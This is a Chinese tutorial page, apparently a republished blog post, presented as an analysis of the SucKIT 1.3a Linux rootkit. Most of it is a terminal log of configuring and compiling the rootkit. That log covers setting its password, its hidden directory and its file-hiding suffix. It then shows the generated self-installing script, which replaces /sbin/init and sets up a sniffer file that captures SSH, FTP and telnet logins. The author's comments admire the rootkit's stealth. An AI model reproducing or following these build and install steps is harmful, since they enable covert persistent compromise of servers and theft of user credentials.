当前位置: 首页 > 图文教程 > 操作系统 > Unix/Linux > suckit后门程序的分析 (二)

Unix/Linux
FreeBSD完全入门手册
FreeBSD中启用3D加速功能的方法
光盘安装OpenBSD3.6的方法
硬盘安装OpenBSD 3.6的方法
FreeBSD局域网内升级Ports Tree及Port的安装
FreeBSD 数据备份和迁移方法
让root用户telnet到FreeBSD的方法
OPENBSD-3.8上快速安装和配置apache+mysql+php+ssl
用OpenBSD 3.8 release自带的FTPD架设FTP服务器
freebsd 常用命令
FreeBSD系统SSH配置详解
FreeBSD 6.2用freebsd-update升级过程
FreeBSD双线负载均衡NAT服务器配置方法
FreeBSD系统下读写 NTFS分区
Freebsd7.0 Apache2.2+MySQL5+PHP5安装和配置方法
freebsd6.2 nginx+php+mysql+zend系统优化防止ddos攻击
FreeBSD5.2.1上建立功能完整的邮件服务器(POSTFIX)
FreeBSD学习经验
FREEBSD系统优化精华
FreeBSD su Sorry问题解决办法

Unix/Linux 中的 suckit后门程序的分析 (二)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-01   浏览: 129 ::
收藏到网摘: n/a


这篇文章为我早期的时候发表的文章,为什么我要写这个呢?因为这个程序写得太精妙了,我不得不佩服他的隐藏性,非常先进。看看我写的就知道他的精妙之处了!
关于这场攻击与反攻击的文章我随后几天撰写。精彩不容错过!:P
[root@Learning sk-1.3a]#makePlease do `make skconfig` in top level directory to generate configuration file.make: *** [include/config.h] Error 1 (告诉我们不要用make,而是用make skconfig)[root@Learning sk-1.3a]#make skconfigrm -f include/config.h sk login instmake[1]: Entering directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o passmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'[===== SucKIT version 1.3a, Jul 26 2004 =====][====== ©oded by sd & devik , 2002 ======]Please enter new rootkit password: (让我们输入密码)Again, just to be sure: (再次输入确认密码)OK, new password set.Home directory [/usr/share/locale/sk/.sk12]: (通过后门进入的缺省目录)Magic file-hiding suffix [sk12]: (sk12后门程序,使用ls –l可以察看到有个.sniffer文件,这个文件是可以窃听到ssh、ftp、telnet等远程登陆的用户名与密码信息,这也正是为何debian服务器接连被黑的事件发生) Configuration saved. (保存配置文件)From now, _only_ this configuration will be used by generatedbinaries till you do skconfig again.To (re)build all of stuff type 'make' (开始执行make命令)[root@Learning sk-1.3a]# makemake[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o loginrm -f sk kernel.omake skmake[2]: Entering directory `/root/backdoor/sk-1.3a/src'make[3]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.cgcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE "\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version" >> kernel.sgcc -c kernel.sgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c pattern.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.cmake[3]: Leaving directory `/root/backdoor/sk-1.3a/src'gcc -s -nostdlib *.o -o skmake[2]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2octmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'cp -f src/DownloadFiles\login logincp -f src/DownloadFiles\sk skCreating install scriptecho "#!/bin/bash" > instecho "D=`cat include/config.h | grep HOME | awk {'print '}`" >> instecho "H=`cat include/config.h | grep HIDESTR | awk {'print '}`" >> instecho "mkdir -p $D; cd $D" >> instecho "echo > .sniffer; chmod 0622 .sniffer" >> instecho "echo -n -e `gzip -9 -c sk | src/DownloadFiles\bin2oct` | gzip -d > sk" >> instecho "chmod 0755 sk; if [ ! -f /sbin/init$ ]; " \"then cp -f /sbin/init /sbin/init$; fi;" \"rm -f /sbin/init; cp sk /sbin/init" >> instOkay, file 'inst' is complete, self-installing script. (将inst文件属性为可执行)Just upload it somewhere, execute and you could log in using./DownloadFiles\login binary.Have fun![root@Learning sk-1.3a]#chmod +x inst (将inst文件属性为可执行)[root@Learning sk-1.3a]# ./i